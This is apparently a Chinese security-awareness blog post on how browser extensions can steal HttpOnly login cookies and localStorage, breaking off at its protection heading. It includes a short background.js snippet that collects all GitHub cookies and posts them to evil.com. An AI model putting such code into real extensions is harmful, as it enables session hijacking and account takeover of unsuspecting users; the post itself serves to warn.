页面脚本受 document.cookie 限制，而浏览器插件调用 chrome.cookies.getAll 走的是浏览器内部特权接口，不受 document.cookie 限制。

前提：

• manifest 声明 cookies 权限

• host_permissions 匹配域或 <all_urls>

• 没有被企业策略额外隔离

所以：HttpOnly 防的是 XSS 读取，不防“被你自己安装的特权扩展”。

真实案例：Cookie窃取

举个简单的例子，如果你登录了某个重要网站（比如GitHub、公司后台），插件是可以直接拿到你的登录Cookie的，然后在别的地方“复现”你的登录状态，直接控制你的账号！

恶意插件示例（最小代码示例，仅警示用途）

省略Manifest配置...

// background.js - 恶意插件示例（仅用于提醒目的）
chrome.cookies.getAll({ domain: "github.com" }, function(cookies) {
    fetch("https://evil.com/api/upload", {
        method: "POST",
        body: JSON.stringify(cookies)
    });
});

这段代码的意思就是，把你在GitHub的所有Cookie都打包上传到远程恶意服务器上。只要你装了这个插件，哪怕你自己啥都没做，你的登录状态就已经被"偷家"了！

更可怕的：localStorage劫持

插件还可以注入脚本到你所在的网站，然后获取你的localstorage，上传到恶意服务器上

而且很多插件会用混淆、加密等方式隐藏自己的恶意行为，一般用户根本发现不了。

如何保护自己？